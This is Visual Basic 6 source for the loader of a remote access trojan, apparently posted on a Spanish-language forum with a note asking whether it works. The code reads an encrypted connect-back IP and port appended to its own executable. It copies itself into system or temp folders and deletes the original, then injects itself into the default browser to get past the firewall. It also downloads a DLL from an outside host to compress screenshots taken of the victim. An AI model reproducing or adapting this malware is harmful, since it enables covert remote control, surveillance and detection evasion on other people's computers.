Código:
Option Explicit
Public Const FINAL_PROGRAM_SIZE = 61440
Public Const PassString As String = "password"
Public Const ServerPass As String = ""
Public IpToConnectTo As String, PortToConnectTo As Long
Public UserConnected As Long, MeltToFile As String, MeltToDirectory As String
Sub Main()
'On Error Resume Next
'
Dim s1 As String, sFile As String
Dim strInfo() As String
Dim ServerFile As String, EncryptedInfo As String
Dim s2 As String, ServerBytes() As Byte, b1() As Byte, MeltDir As Long
Dim InjectedProcesses() As String, ProcessToInject As String
Dim i1 As Long, i2 As Long, i3 As Long
EncryptedInfo = SysDir & "ei_log.log"
If FileExists(EncryptedInfo) Then
If FileLen(EncryptedInfo) = 0 Then
DeleteFile EncryptedInfo
ShellExecute 0, "", AppExe, 0, "", 1
End
End If
'firewall bypass
'this part of the program reads itself.
'a file was stored in the other instance that is now available for use
'so you have to collect the RAT [stored] data and use it in the RAT
sFile = DecryptString(StrConv(vbReadEndFile(EncryptedInfo, 0), vbFromUnicode), PassString)
s1 = sFile
IpToConnectTo = Mid(s1, InStr(1, s1, "{01=") + 4, InStr(1, s1, "=01}") - InStr(1, s1, "{01=") - 4)
PortToConnectTo = CLng(Mid(s1, InStr(1, s1, "{02=") + 4, InStr(1, s1, "=02}") - InStr(1, s1, "{02=") - 4))
MeltToFile = Mid(sFile, InStr(1, sFile, "{04=") + 4, InStr(1, sFile, "=04}") - InStr(1, sFile, "{04=") - 4)
MeltDir = Mid(sFile, InStr(1, sFile, "{05=") + 4, InStr(1, sFile, "=05}") - InStr(1, sFile, "{05=") - 4)
Select Case MeltDir
Case 0
MeltToDirectory = SysDir
Case 1
MeltToDirectory = WinDir
Case 2
MeltToDirectory = AppPath
Case 3
MeltToDirectory = GetTempPath
End Select
MeltToFile = LCase(MeltToDirectory & MeltToFile)
'if user doesnt have zLib, download it now for compression
'this will make the 2.5 mb screenshots ~50kb, and still crystal clear picture
If UserHasZLIB = 0 Then
DeleteFile SysDir & "zlib.dll"
Call GetInternetFile("http://www.hotlinkfiles.com/files/878001_9nuek/zlib.dll", SysDir & "zlib.dll", 256)
End If
DeleteFile EncryptedInfo
Load frmMain
frmMain.Show
Else
'default when user opens.. right here we want to store the RAT's
'information so that the firewall bypass can read it, avoiding registry.
'might as well encrypt the file
'soo in a nutshell..
'this part of the program reads itself and stores the information for
'access to the next loaded version with FWB+
'i keep these notes to help me remind myself.
'open itself and decrypt string
ServerBytes = vbReadEndFile(AppExe, FINAL_PROGRAM_SIZE)
sFile = CStr(ServerBytes())
ServerBytes = sFile
DeleteFile EncryptedInfo
vbWriteByteFile EncryptedInfo, ServerBytes
sFile = DecryptString(sFile, PassString)
'=================================
'
'Find a process to inject to, with internet access
'
'=================================
s2 = Mid(sFile, InStr(1, sFile, "{08=") + 4, InStr(1, sFile, "=08}") - InStr(1, sFile, "{08=") - 4)
If InStr(1, s2, "|") Then
InjectedProcesses = Split(s2, "|")
For i1 = LBound(InjectedProcesses) To UBound(InjectedProcesses)
If LCase(InjectedProcesses(i1)) = LCase("[DefaultBrowser]") Then
'If we hit the default browser, we are just gonna load into it
InjectedProcesses(i1) = ExeRegPath(DefaultBrowser)
If FileExists(InjectedProcesses(i1)) Then
'the browser exists, inject into it
ProcessToInject = InjectedProcesses(i1)
Else
If Len(s2) = 0 Then
'alternative find default browser through Shell32
End If
End If
i1 = UBound(InjectedProcesses)
End If
If IsProcessEXERunning(InjectedProcesses(i1)) Then
'process running , run one after
ProcessToInject = AppFullPath(InjectedProcesses(i1))
i1 = UBound(InjectedProcesses)
End If
Next
If ProcessToInject = "" Then ProcessToInject = ExeRegPath(DefaultBrowser)
End If
'=================================
'
'Determine if we need to melt
'
'=================================
MeltToFile = Mid(sFile, InStr(1, sFile, "{04=") + 4, InStr(1, sFile, "=04}") - InStr(1, sFile, "{04=") - 4)
MeltDir = Mid(sFile, InStr(1, sFile, "{05=") + 4, InStr(1, sFile, "=05}") - InStr(1, sFile, "{05=") - 4)
Select Case MeltDir
Case 0
MeltToDirectory = SysDir
Case 1
MeltToDirectory = WinDir
Case 2
MeltToDirectory = AppPath
Case 3
MeltToDirectory = GetTempPath
End Select
MeltToFile = LCase(MeltToDirectory & MeltToFile)
If LCase(AppExe) <> MeltToFile Then
'we need to melt
DeleteFile MeltToFile
If MeltDir <> 2 Then FileCopy AppExe, MeltToFile
b1 = LoadFile(AppExe)
If MeltDir <> 2 Then InitiateMelt
RunExe ProcessToInject, b1
Exit Sub
Else
'shouldnt be occuring!!
'program will uninstall after this
DeleteFile EncryptedInfo
MsgBox "Program Detection Error"
InitiateMelt
End
End If
End If
End Sub
PROBAR SI SIRVE ESTO :s